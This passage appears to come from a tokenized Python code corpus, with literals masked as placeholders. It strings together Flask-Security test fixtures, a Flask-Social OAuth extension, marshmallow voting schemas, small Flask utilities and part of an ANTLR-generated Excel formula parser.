<EOL> ( <NUM_LIT:1> , <NUM_LIT:12> ) : tokens [ <NUM_LIT:3> ] , <EOL> } <EOL> raw = { } <EOL> return SourceMapIndex ( raw , tokens , rows , index ) , tokens <EOL> def test_lookup ( self ) : <EOL> index , tokens = self . get_index ( ) <EOL> for i in range ( <NUM_LIT:5> ) : <EOL> assert index . lookup ( <NUM_LIT:0> , i ) is tokens [ <NUM_LIT:0> ] <EOL> for i in range ( <NUM_LIT:5> , <NUM_LIT:10> ) : <EOL> assert index . lookup ( <NUM_LIT:0> , i ) is tokens [ <NUM_LIT:1> ] <EOL> for i in range ( <NUM_LIT:12> ) : <EOL> assert index . lookup ( <NUM_LIT:1> , i ) is tokens [ <NUM_LIT:2> ] <EOL> for i in range ( <NUM_LIT:12> , <NUM_LIT:20> ) : <EOL> assert index . lookup ( <NUM_LIT:1> , i ) is tokens [ <NUM_LIT:3> ] <EOL> def test_getitem ( self ) : <EOL> index , tokens = self . get_index ( ) <EOL> for i in range ( <NUM_LIT:4> ) : <EOL> assert index [ i ] is tokens [ i ] <EOL> def test_iter ( self ) : <EOL> index , tokens = self . get_index ( ) <EOL> for idx , token in enumerate ( index ) : <EOL> assert token is tokens [ idx ] <EOL> def test_len ( self ) : <EOL> index , tokens = self . get_index ( ) <EOL> assert len ( index ) == len ( tokens ) </s>
<s> """<STR_LIT>""" <EOL> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = __doc__ , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> zip_safe = False , <EOL> platforms = '<STR_LIT>' , <EOL> install_requires = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> test_suite = '<STR_LIT>' , <EOL> tests_require = [ '<STR_LIT>' ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import tempfile <EOL> import time <EOL> import pytest <EOL> from flask import Flask , render_template <EOL> from flask_mail import Mail <EOL> from flask_security import Security , MongoEngineUserDatastore , SQLAlchemyUserDatastore , PeeweeUserDatastore , UserMixin , RoleMixin , http_auth_required , login_required , auth_token_required , auth_required , roles_required , roles_accepted <EOL> from utils import populate_data , Response <EOL> @ pytest . fixture ( ) <EOL> def app ( request ) : <EOL> app = Flask ( __name__ ) <EOL> app . response_class = Response <EOL> app . debug = True <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> app . config [ '<STR_LIT>' ] = True <EOL> app . config [ '<STR_LIT>' ] = False <EOL> app . config [ '<STR_LIT>' ] = False <EOL> for opt in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> app . config [ '<STR_LIT>' + opt . upper ( ) ] = opt in request . keywords <EOL> if '<STR_LIT>' in request . keywords : <EOL> for key , value in request . keywords [ '<STR_LIT>' ] . kwargs . items ( ) : <EOL> app . config [ '<STR_LIT>' + key . upper ( ) ] = value <EOL> mail = Mail ( app ) <EOL> app . mail = mail <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ login_required <EOL> def profile ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ login_required <EOL> def post_login ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ http_auth_required <EOL> def http ( ) : <EOL> return '<STR_LIT>' <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ http_auth_required ( '<STR_LIT>' ) <EOL> def http_custom_realm ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> @ auth_token_required <EOL> def token ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ auth_required ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def multi_auth ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def post_logout ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def post_register ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ roles_required ( '<STR_LIT>' ) <EOL> def admin ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ roles_required ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def admin_and_editor ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ roles_accepted ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def admin_or_editor ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def unauthorized ( ) : <EOL> return render_template ( '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def page_1 ( ) : <EOL> return '<STR_LIT>' <EOL> return app <EOL> @ pytest . fixture ( ) <EOL> def mongoengine_datastore ( request , app ) : <EOL> from flask_mongoengine import MongoEngine <EOL> db_name = '<STR_LIT>' % str ( time . time ( ) ) . replace ( '<STR_LIT:.>' , '<STR_LIT:_>' ) <EOL> app . config [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : db_name , <EOL> '<STR_LIT:host>' : '<STR_LIT:localhost>' , <EOL> '<STR_LIT:port>' : <NUM_LIT> , <EOL> '<STR_LIT>' : db_name <EOL> } <EOL> db = MongoEngine ( app ) <EOL> class Role ( db . Document , RoleMixin ) : <EOL> name = db . StringField ( required = True , unique = True , max_length = <NUM_LIT> ) <EOL> description = db . StringField ( max_length = <NUM_LIT:255> ) <EOL> meta = { "<STR_LIT>" : db_name } <EOL> class User ( db . Document , UserMixin ) : <EOL> email = db . StringField ( unique = True , max_length = <NUM_LIT:255> ) <EOL> username = db . StringField ( max_length = <NUM_LIT:255> ) <EOL> password = db . StringField ( required = False , max_length = <NUM_LIT:255> ) <EOL> last_login_at = db . DateTimeField ( ) <EOL> current_login_at = db . DateTimeField ( ) <EOL> last_login_ip = db . StringField ( max_length = <NUM_LIT:100> ) <EOL> current_login_ip = db . StringField ( max_length = <NUM_LIT:100> ) <EOL> login_count = db . IntField ( ) <EOL> active = db . BooleanField ( default = True ) <EOL> confirmed_at = db . DateTimeField ( ) <EOL> roles = db . ListField ( db . ReferenceField ( Role ) , default = [ ] ) <EOL> meta = { "<STR_LIT>" : db_name } <EOL> request . addfinalizer ( lambda : db . connection . drop_database ( db_name ) ) <EOL> return MongoEngineUserDatastore ( db , User , Role ) <EOL> @ pytest . fixture ( ) <EOL> def sqlalchemy_datastore ( request , app , tmpdir ) : <EOL> from flask_sqlalchemy import SQLAlchemy <EOL> f , path = tempfile . mkstemp ( prefix = '<STR_LIT>' , suffix = '<STR_LIT>' , dir = str ( tmpdir ) ) <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' + path <EOL> db = SQLAlchemy ( app ) <EOL> roles_users = db . Table ( <EOL> '<STR_LIT>' , <EOL> db . Column ( '<STR_LIT>' , db . Integer ( ) , db . ForeignKey ( '<STR_LIT>' ) ) , <EOL> db . Column ( '<STR_LIT>' , db . Integer ( ) , db . ForeignKey ( '<STR_LIT>' ) ) ) <EOL> class Role ( db . Model , RoleMixin ) : <EOL> id = db . Column ( db . Integer ( ) , primary_key = True ) <EOL> name = db . Column ( db . String ( <NUM_LIT> ) , unique = True ) <EOL> description = db . Column ( db . String ( <NUM_LIT:255> ) ) <EOL> class User ( db . Model , UserMixin ) : <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> email = db . Column ( db . String ( <NUM_LIT:255> ) , unique = True ) <EOL> username = db . Column ( db . String ( <NUM_LIT:255> ) ) <EOL> password = db . Column ( db . String ( <NUM_LIT:255> ) ) <EOL> last_login_at = db . Column ( db . DateTime ( ) ) <EOL> current_login_at = db . Column ( db . DateTime ( ) ) <EOL> last_login_ip = db . Column ( db . String ( <NUM_LIT:100> ) ) <EOL> current_login_ip = db . Column ( db . String ( <NUM_LIT:100> ) ) <EOL> login_count = db . Column ( db . Integer ) <EOL> active = db . Column ( db . Boolean ( ) ) <EOL> confirmed_at = db . Column ( db . DateTime ( ) ) <EOL> roles = db . relationship ( '<STR_LIT>' , secondary = roles_users , <EOL> backref = db . backref ( '<STR_LIT>' , lazy = '<STR_LIT>' ) ) <EOL> with app . app_context ( ) : <EOL> db . create_all ( ) <EOL> request . addfinalizer ( lambda : os . remove ( path ) ) <EOL> return SQLAlchemyUserDatastore ( db , User , Role ) <EOL> @ pytest . fixture ( ) <EOL> def peewee_datastore ( request , app , tmpdir ) : <EOL> from peewee import TextField , DateTimeField , IntegerField , BooleanField , ForeignKeyField <EOL> from flask_peewee . db import Database <EOL> f , path = tempfile . mkstemp ( prefix = '<STR_LIT>' , suffix = '<STR_LIT>' , dir = str ( tmpdir ) ) <EOL> app . config [ '<STR_LIT>' ] = { <EOL> '<STR_LIT:name>' : path , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> db = Database ( app ) <EOL> class Role ( db . Model , RoleMixin ) : <EOL> name = TextField ( unique = True ) <EOL> description = TextField ( null = True ) <EOL> class User ( db . Model , UserMixin ) : <EOL> email = TextField ( ) <EOL> username = TextField ( ) <EOL> password = TextField ( null = True ) <EOL> last_login_at = DateTimeField ( null = True ) <EOL> current_login_at = DateTimeField ( null = True ) <EOL> last_login_ip = TextField ( null = True ) <EOL> current_login_ip = TextField ( null = True ) <EOL> login_count = IntegerField ( null = True ) <EOL> active = BooleanField ( default = True ) <EOL> confirmed_at = DateTimeField ( null = True ) <EOL> class UserRoles ( db . Model ) : <EOL> """<STR_LIT>""" <EOL> user = ForeignKeyField ( User , related_name = '<STR_LIT>' ) <EOL> role = ForeignKeyField ( Role , related_name = '<STR_LIT>' ) <EOL> name = property ( lambda self : self . role . name ) <EOL> description = property ( lambda self : self . role . description ) <EOL> with app . app_context ( ) : <EOL> for Model in ( Role , User , UserRoles ) : <EOL> Model . create_table ( ) <EOL> request . addfinalizer ( lambda : os . remove ( path ) ) <EOL> return PeeweeUserDatastore ( db , User , Role , UserRoles ) <EOL> @ pytest . fixture ( ) <EOL> def sqlalchemy_app ( app , sqlalchemy_datastore ) : <EOL> def create ( ) : <EOL> app . security = Security ( app , datastore = sqlalchemy_datastore ) <EOL> return app <EOL> return create <EOL> @ pytest . fixture ( ) <EOL> def peewee_app ( app , peewee_datastore ) : <EOL> def create ( ) : <EOL> app . security = Security ( app , datastore = peewee_datastore ) <EOL> return app <EOL> return create <EOL> @ pytest . fixture ( ) <EOL> def mongoengine_app ( app , mongoengine_datastore ) : <EOL> def create ( ) : <EOL> app . security = Security ( app , datastore = mongoengine_datastore ) <EOL> return app <EOL> return create <EOL> @ pytest . fixture ( ) <EOL> def client ( request , sqlalchemy_app ) : <EOL> app = sqlalchemy_app ( ) <EOL> populate_data ( app ) <EOL> return app . test_client ( ) <EOL> @ pytest . fixture ( ) <EOL> def get_message ( app ) : <EOL> def fn ( key , ** kwargs ) : <EOL> rv = app . config [ '<STR_LIT>' + key ] [ <NUM_LIT:0> ] % kwargs <EOL> return rv . encode ( '<STR_LIT:utf-8>' ) <EOL> return fn <EOL> @ pytest . fixture ( params = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def datastore ( request , sqlalchemy_datastore , mongoengine_datastore , peewee_datastore ) : <EOL> if request . param == '<STR_LIT>' : <EOL> rv = sqlalchemy_datastore <EOL> elif request . param == '<STR_LIT>' : <EOL> rv = mongoengine_datastore <EOL> elif request . param == '<STR_LIT>' : <EOL> rv = peewee_datastore <EOL> return rv </s>
<s> """<STR_LIT>""" <EOL> from importlib import import_module <EOL> from flask import current_app <EOL> from flask_oauthlib . client import OAuthRemoteApp as BaseRemoteApp <EOL> from flask . ext . security import current_user <EOL> from werkzeug . local import LocalProxy <EOL> from . utils import get_config , update_recursive <EOL> from . views import create_blueprint <EOL> _security = LocalProxy ( lambda : current_app . extensions [ '<STR_LIT>' ] ) <EOL> _social = LocalProxy ( lambda : current_app . extensions [ '<STR_LIT>' ] ) <EOL> _datastore = LocalProxy ( lambda : _social . datastore ) <EOL> _logger = LocalProxy ( lambda : current_app . logger ) <EOL> default_config = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> class OAuthRemoteApp ( BaseRemoteApp ) : <EOL> def __init__ ( self , id , module , install , * args , ** kwargs ) : <EOL> BaseRemoteApp . __init__ ( self , None , ** kwargs ) <EOL> self . id = id <EOL> self . module = module <EOL> def get_connection ( self ) : <EOL> return _social . datastore . find_connection ( provider_id = self . id , <EOL> user_id = current_user . id ) <EOL> def get_api ( self ) : <EOL> module = import_module ( self . module ) <EOL> connection = self . get_connection ( ) <EOL> if connection is None : <EOL> return None <EOL> return module . get_api ( connection = connection , <EOL> consumer_key = self . consumer_key , <EOL> consumer_secret = self . consumer_secret ) <EOL> def _get_state ( app , datastore , providers , ** kwargs ) : <EOL> config = get_config ( app ) <EOL> for key in providers . keys ( ) : <EOL> config . pop ( key . upper ( ) ) <EOL> for key , value in config . items ( ) : <EOL> kwargs [ key . lower ( ) ] = value <EOL> kwargs . update ( dict ( <EOL> app = app , <EOL> datastore = datastore , <EOL> providers = providers ) ) <EOL> return _SocialState ( ** kwargs ) <EOL> class _SocialState ( object ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> for key , value in kwargs . items ( ) : <EOL> setattr ( self , key . lower ( ) , value ) <EOL> def __getattr__ ( self , name ) : <EOL> try : <EOL> return self . providers [ name ] <EOL> except KeyError : <EOL> msg = "<STR_LIT>" % name <EOL> raise AttributeError ( msg ) <EOL> def _get_token ( ) : <EOL> return None <EOL> class Social ( object ) : <EOL> def __init__ ( self , app = None , datastore = None ) : <EOL> self . app = app <EOL> self . datastore = datastore <EOL> if app is not None and datastore is not None : <EOL> self . _state = self . init_app ( app , datastore ) <EOL> def init_app ( self , app , datastore = None ) : <EOL> """<STR_LIT>""" <EOL> datastore = datastore or self . datastore <EOL> for key , value in default_config . items ( ) : <EOL> app . config . setdefault ( key , value ) <EOL> providers = dict ( ) <EOL> for key , config in app . config . items ( ) : <EOL> if not key . startswith ( '<STR_LIT>' ) or config is None or key in default_config : <EOL> continue <EOL> suffix = key . lower ( ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> default_module_name = '<STR_LIT>' % suffix <EOL> module_name = config . get ( '<STR_LIT>' , default_module_name ) <EOL> module = import_module ( module_name ) <EOL> config = update_recursive ( module . config , config ) <EOL> providers [ config [ '<STR_LIT:id>' ] ] = OAuthRemoteApp ( ** config ) <EOL> providers [ config [ '<STR_LIT:id>' ] ] . tokengetter ( _get_token ) <EOL> state = _get_state ( app , datastore , providers ) <EOL> app . register_blueprint ( create_blueprint ( state , __name__ ) ) <EOL> app . extensions [ '<STR_LIT>' ] = state <EOL> return state <EOL> def __getattr__ ( self , name ) : <EOL> return getattr ( self . _state , name , None ) </s>
<s> """<STR_LIT>""" <EOL> from flask . ext . script import Manager <EOL> from overholt . api import create_app <EOL> from overholt . manage import CreateUserCommand , DeleteUserCommand , ListUsersCommand <EOL> manager = Manager ( create_app ( ) ) <EOL> manager . add_command ( '<STR_LIT>' , CreateUserCommand ( ) ) <EOL> manager . add_command ( '<STR_LIT>' , DeleteUserCommand ( ) ) <EOL> manager . add_command ( '<STR_LIT>' , ListUsersCommand ( ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> manager . run ( ) </s>
<s> """<STR_LIT>""" <EOL> from . . core import Service <EOL> from . models import User <EOL> class UsersService ( Service ) : <EOL> __model__ = User </s>
<s> from marshmallow import Schema , fields , validate <EOL> class OptionSchema ( Schema ) : <EOL> id = fields . Integer ( dump_only = True ) <EOL> description = fields . String ( required = True ) <EOL> created_at = fields . DateTime ( dump_only = True ) <EOL> class VotingSchema ( Schema ) : <EOL> id = fields . Integer ( dump_only = True ) <EOL> description = fields . String ( required = True ) <EOL> created_at = fields . DateTime ( dump_only = True ) <EOL> options = fields . Nested ( <EOL> OptionSchema , many = True , required = True , <EOL> validate = validate . Length ( min = <NUM_LIT:2> , error = '<STR_LIT>' ) <EOL> ) <EOL> class Meta : <EOL> ordered = True <EOL> class VoteSchema ( Schema ) : <EOL> option = fields . Integer ( required = True ) </s>
<s> import sys <EOL> import antlr <EOL> version = sys . version . split ( ) [ <NUM_LIT:0> ] <EOL> if version < '<STR_LIT>' : <EOL> False = <NUM_LIT:0> <EOL> if version < '<STR_LIT>' : <EOL> True = not False <EOL> import struct <EOL> import Utils <EOL> from UnicodeUtils import upack1 <EOL> from ExcelMagic import * <EOL> _RVAdelta = { "<STR_LIT:R>" : <NUM_LIT:0> , "<STR_LIT>" : <NUM_LIT> , "<STR_LIT:A>" : <NUM_LIT> } <EOL> _RVAdeltaRef = { "<STR_LIT:R>" : <NUM_LIT:0> , "<STR_LIT>" : <NUM_LIT> , "<STR_LIT:A>" : <NUM_LIT> , "<STR_LIT:D>" : <NUM_LIT> } <EOL> _RVAdeltaArea = { "<STR_LIT:R>" : <NUM_LIT:0> , "<STR_LIT>" : <NUM_LIT> , "<STR_LIT:A>" : <NUM_LIT> , "<STR_LIT:D>" : <NUM_LIT:0> } <EOL> class FormulaParseException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> SKIP = antlr . SKIP <EOL> INVALID_TYPE = antlr . INVALID_TYPE <EOL> EOF_TYPE = antlr . EOF_TYPE <EOL> EOF = antlr . EOF <EOL> NULL_TREE_LOOKAHEAD = antlr . NULL_TREE_LOOKAHEAD <EOL> MIN_USER_TYPE = antlr . MIN_USER_TYPE <EOL> TRUE_CONST = <NUM_LIT:4> <EOL> FALSE_CONST = <NUM_LIT:5> <EOL> STR_CONST = <NUM_LIT:6> <EOL> NUM_CONST = <NUM_LIT:7> <EOL> INT_CONST = <NUM_LIT:8> <EOL> FUNC_IF = <NUM_LIT:9> <EOL> FUNC_CHOOSE = <NUM_LIT:10> <EOL> NAME = <NUM_LIT:11> <EOL> QUOTENAME = <NUM_LIT:12> <EOL> EQ = <NUM_LIT> <EOL> NE = <NUM_LIT> <EOL> GT = <NUM_LIT:15> <EOL> LT = <NUM_LIT:16> <EOL> GE = <NUM_LIT> <EOL> LE = <NUM_LIT> <EOL> ADD = <NUM_LIT> <EOL> SUB = <NUM_LIT:20> <EOL> MUL = <NUM_LIT> <EOL> DIV = <NUM_LIT> <EOL> POWER = <NUM_LIT> <EOL> PERCENT = <NUM_LIT> <EOL> LP = <NUM_LIT> <EOL> RP = <NUM_LIT> <EOL> LB = <NUM_LIT> <EOL> RB = <NUM_LIT> <EOL> COLON = <NUM_LIT> <EOL> COMMA = <NUM_LIT:30> <EOL> SEMICOLON = <NUM_LIT> <EOL> REF2D = <NUM_LIT:32> <EOL> REF2D_R1C1 = <NUM_LIT> <EOL> BANG = <NUM_LIT> <EOL> CONCAT = <NUM_LIT> <EOL> class Parser ( antlr . LLkParser ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> antlr . LLkParser . __init__ ( self , * args , ** kwargs ) <EOL> self . tokenNames = _tokenNames <EOL> self . rpn = "<STR_LIT>" <EOL> self . sheet_references = [ ] <EOL> self . xcall_references = [ ] <EOL> def formula ( self ) : <EOL> pass <EOL> self . expr ( "<STR_LIT>" ) <EOL> def expr ( self , <EOL> arg_type <EOL> ) : <EOL> pass <EOL> self . prec0_expr ( arg_type ) <EOL> while True : <EOL> if ( ( self . LA ( <NUM_LIT:1> ) >= EQ and self . LA ( <NUM_LIT:1> ) <= LE ) ) : <EOL> pass <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ EQ ] : <EOL> pass <EOL> self . match ( EQ ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgEQ ) <EOL> elif la1 and la1 in [ NE ] : <EOL> pass <EOL> self . match ( NE ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgNE ) <EOL> elif la1 and la1 in [ GT ] : <EOL> pass <EOL> self . match ( GT ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgGT ) <EOL> elif la1 and la1 in [ LT ] : <EOL> pass <EOL> self . match ( LT ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgLT ) <EOL> elif la1 and la1 in [ GE ] : <EOL> pass <EOL> self . match ( GE ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgGE ) <EOL> elif la1 and la1 in [ LE ] : <EOL> pass <EOL> self . match ( LE ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgLE ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> self . prec0_expr ( arg_type ) <EOL> self . rpn += op <EOL> else : <EOL> break <EOL> def prec0_expr ( self , <EOL> arg_type <EOL> ) : <EOL> pass <EOL> self . prec1_expr ( arg_type ) <EOL> while True : <EOL> if ( self . LA ( <NUM_LIT:1> ) == CONCAT ) : <EOL> pass <EOL> pass <EOL> self . match ( CONCAT ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgConcat ) <EOL> self . prec1_expr ( arg_type ) <EOL> self . rpn += op <EOL> else : <EOL> break <EOL> def prec1_expr ( self , <EOL> arg_type <EOL> ) : <EOL> pass <EOL> self . prec2_expr ( arg_type ) <EOL> while True : <EOL> if ( self . LA ( <NUM_LIT:1> ) == ADD or self . LA ( <NUM_LIT:1> ) == SUB ) : <EOL> pass <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ ADD ] : <EOL> pass <EOL> self . match ( ADD ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgAdd ) <EOL> elif la1 and la1 in [ SUB ] : <EOL> pass <EOL> self . match ( SUB ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgSub ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> self . prec2_expr ( arg_type ) <EOL> self . rpn += op ; <EOL> else : <EOL> break <EOL> def prec2_expr ( self , <EOL> arg_type <EOL> ) : <EOL> pass <EOL> self . prec3_expr ( arg_type ) <EOL> while True : <EOL> if ( self . LA ( <NUM_LIT:1> ) == MUL or self . LA ( <NUM_LIT:1> ) == DIV ) : <EOL> pass <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ MUL ] : <EOL> pass <EOL> self . match ( MUL ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgMul ) <EOL> elif la1 and la1 in [ DIV ] : <EOL> pass <EOL> self . match ( DIV ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgDiv ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> self . prec3_expr ( arg_type ) <EOL> self . rpn += op <EOL> else : <EOL> break <EOL> def prec3_expr ( self , <EOL> arg_type <EOL> ) : <EOL> pass <EOL> self . prec4_expr ( arg_type ) <EOL> while True : <EOL> if ( self . LA ( <NUM_LIT:1> ) == POWER ) : <EOL> pass <EOL> pass <EOL> self . match ( POWER ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgPower ) <EOL> self . prec4_expr ( arg_type ) <EOL> self . rpn += op <EOL> else : <EOL> break <EOL> def prec4_expr ( self , <EOL> arg_type <EOL> ) : <EOL> pass <EOL> self . prec5_expr ( arg_type ) <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ PERCENT ] : <EOL> pass <EOL> self . match ( PERCENT ) <EOL> self . rpn += struct . pack ( '<STR_LIT:B>' , ptgPercent ) <EOL> elif la1 and la1 in [ EOF , EQ , NE , GT , LT , GE , LE , ADD , SUB , MUL , DIV , POWER , RP , COMMA , SEMICOLON , CONCAT ] : <EOL> pass <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> def prec5_expr ( self , <EOL> arg_type <EOL> ) : <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ TRUE_CONST , FALSE_CONST , STR_CONST , NUM_CONST , INT_CONST , FUNC_IF , FUNC_CHOOSE , NAME , QUOTENAME , LP , REF2D ] : <EOL> pass <EOL> self . primary ( arg_type ) <EOL> elif la1 and la1 in [ SUB ] : <EOL> pass <EOL> self . match ( SUB ) <EOL> self . primary ( arg_type ) <EOL> self . rpn += struct . pack ( '<STR_LIT:B>' , ptgUminus ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> def primary ( self , <EOL> arg_type <EOL> ) : <EOL> str_tok = None <EOL> int_tok = None <EOL> num_tok = None <EOL> ref2d_tok = None <EOL> ref2d1_tok = None <EOL> ref2d2_tok = None <EOL> ref3d_ref2d = None <EOL> ref3d_ref2d2 = None <EOL> name_tok = None <EOL> func_tok = None <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ TRUE_CONST ] : <EOL> pass <EOL> self . match ( TRUE_CONST ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgBool , <NUM_LIT:1> ) <EOL> elif la1 and la1 in [ FALSE_CONST ] : <EOL> pass <EOL> self . match ( FALSE_CONST ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgBool , <NUM_LIT:0> ) <EOL> elif la1 and la1 in [ STR_CONST ] : <EOL> pass <EOL> str_tok = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( STR_CONST ) <EOL> self . rpn += struct . pack ( "<STR_LIT:B>" , ptgStr ) + upack1 ( str_tok . text [ <NUM_LIT:1> : - <NUM_LIT:1> ] . replace ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> elif la1 and la1 in [ NUM_CONST ] : <EOL> pass <EOL> num_tok = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( NUM_CONST ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgNum , float ( num_tok . text ) ) <EOL> elif la1 and la1 in [ FUNC_IF ] : <EOL> pass <EOL> self . match ( FUNC_IF ) <EOL> self . match ( LP ) <EOL> self . expr ( "<STR_LIT>" ) <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ SEMICOLON ] : <EOL> pass <EOL> self . match ( SEMICOLON ) <EOL> elif la1 and la1 in [ COMMA ] : <EOL> pass <EOL> self . match ( COMMA ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgAttr , <NUM_LIT> , <NUM_LIT:0> ) <EOL> pos0 = len ( self . rpn ) - <NUM_LIT:2> <EOL> self . expr ( arg_type ) <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ SEMICOLON ] : <EOL> pass <EOL> self . match ( SEMICOLON ) <EOL> elif la1 and la1 in [ COMMA ] : <EOL> pass <EOL> self . match ( COMMA ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgAttr , <NUM_LIT> , <NUM_LIT:0> ) <EOL> pos1 = len ( self . rpn ) - <NUM_LIT:2> <EOL> self . rpn = self . rpn [ : pos0 ] + struct . pack ( "<STR_LIT>" , pos1 - pos0 ) + self . rpn [ pos0 + <NUM_LIT:2> : ] <EOL> self . expr ( arg_type ) <EOL> self . match ( RP ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgAttr , <NUM_LIT> , <NUM_LIT:3> ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgFuncVarR , <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> pos2 = len ( self . rpn ) <EOL> self . rpn = self . rpn [ : pos1 ] + struct . pack ( "<STR_LIT>" , pos2 - ( pos1 + 